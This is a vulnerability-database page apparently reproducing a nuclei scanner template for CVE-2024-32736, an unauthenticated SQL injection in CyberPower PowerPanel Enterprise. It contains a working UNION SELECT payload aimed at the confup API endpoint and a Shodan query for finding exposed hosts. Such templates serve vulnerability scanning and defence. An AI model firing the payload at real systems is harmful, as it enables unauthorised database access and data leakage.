Lucene search
K

CyberPower < v2.8.3 - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

CyberPower < v2.8.3 - SQL Injection. Vulnerability allows unauthenticated remote attacker to leak sensitive information via the "query_utask_verbose" function within MCUDBHelper

Related
Refs
Code
id: CVE-2024-32736

info:
  name: CyberPower < v2.8.3 - SQL Injection
  author: DhiyaneshDk
  severity: high
  description: |
    A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to .
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    An unauthenticated remote attacker can leak sensitive information via the "query_utask_verbose" function within MCUDBHelper.
  reference:
    - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote
    - https://www.tenable.com/security/research/tra-2024-14
    - https://nvd.nist.gov/vuln/detail/CVE-2024-32736
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-32736
    epss-score: 0.05408
    epss-percentile: 0.9172
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"<title>PDNU</title>"
  tags: cve,cve2024,cyberpower,sqli,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '"code":"([0-9.]+)"'

      - type: word
        part: body
        words:
          - '"results":'
          - '{"status":"finished'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - '"code":"([0-9.]+)"'
# digest: 4a0a00473045022025da0b080470f56b24cc94f6bdaef31867bac56adc03a8ffa455d9dc9e7f85ab022100d54b54a34ca11bae73907e15e4fc5d707503002b86a5f8d8916c3badb04f90b5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.5
EPSS0.05408
SSVC
29